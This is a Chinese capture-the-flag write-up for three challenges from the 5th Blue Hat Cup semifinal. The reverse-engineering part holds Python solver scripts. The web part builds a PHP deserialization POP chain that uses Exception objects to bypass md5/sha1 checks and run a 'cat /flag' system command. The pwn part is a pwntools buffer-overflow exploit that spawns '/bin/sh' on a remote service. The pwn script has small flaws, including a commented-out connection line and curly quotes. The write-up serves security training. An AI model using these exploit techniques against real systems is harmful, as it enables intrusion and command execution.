第五届蓝帽杯半决赛部分WP

文章目录

• RE:ser_leak
• WEB:杰克与肉丝
• PWN:cover

RE:ser_leak

题目是原题：

x1-x5:

def func2(x):
	if x == 0:
		return 0
	return (x % 2) + func2(x // 2)

def func3(x):
	return x % 2

def func1(N, L, R):
	if L == R:
		return L
	mid = (L + R + 1) // 2
	if N < mid * mid:
		return func1(N, L, mid - 1)
	else:
		return func1(N, mid, R)

def _func1(x):
	return func1(x, 1, x)



if __name__ == '__main__':
	x1_flag = False
	x2_flag = False
	x3_flag = False
	x4_flag = False
	x5_flag = False
	for i in range(10000000, 100000000):
		if func3(func2(i)) != 1:
			continue
		if _func1(i) == 963 and not x1_flag:
			print("x1:",i)
			x1_flag = True
		if _func1(i) == 4396 and not x2_flag:
			print("x2:",i)
			x2_flag = True
		if _func1(i) == 6666 and not x3_flag:
			print("x3:",i)
			x3_flag = True
		if _func1(i) == 1999 and not x4_flag:
			print("x4:",i)
			x4_flag = True
		if _func1(i) == 3141 and not x5_flag:
			print("x5:",i)
			x5_flag = True

           

x6

def nextm(n, m):
	if m*m <= n:
		return m+1
	else:
		return 0

def nextn(n, m):
	return (n % m != 0) * n

def test(n, m):
	if n == 0:
		return 0
	if m == 0:
		return 1
	return test(nextn(n, m), nextm(n, m))

def func4(x):
	if x == 1:
		return 0
	if x == 2:
		return 1
	return test(x, 2)


if __name__ == '__main__':
	x6 = 0
	for i in range(1, 5):
		if func4(i*2-1) == 1:
			x6 += 1
	print(x6)

           

WEB:杰克与肉丝

考点：

1、php反序列化pop链构造

2、Exception类绕过md5、sha1

参考

https://blog.csdn.net/LYJ20010728/article/details/114493052

代码：

<?php
class Titanic{
    public $people;
    public $ship;
    function __construct(){
        $this->people = new Jack();
        $this->ship = new Love();
    }
}

class Jack{
    private $action;
    function __set($a, $b)
    {
        $b->$a();
    }
}

class Love {
    public $var;
    function __construct(){
        $this->var = new Rose();
    }
}

class Rose {
    public $var1,$var2;
    public function __construct(){
        $cmd ='system("cat /flag");?>';
        $a = new Exception($cmd);$b = new Exception($cmd,1);
        $this->var1 = $a;
        $this->var2 = $b;
    }
}
$f = new Titanic();
echo urlencode(serialize($f));
           

PWN:cover

把那个地址写在buf里面溢出到v5的位置 fastcall函数调用, 执行/bin / sh.

exp如下：

from pwn import *
context.log_level = ‘debug’

#p = process("./pwn")
#p = remote(" 118.190.62.234",12435)
p.recv()
p.send(p32(0x80484D2)+b’\x24’)
p.recv()
p.send(‘/bin/sh’)
p.interactive()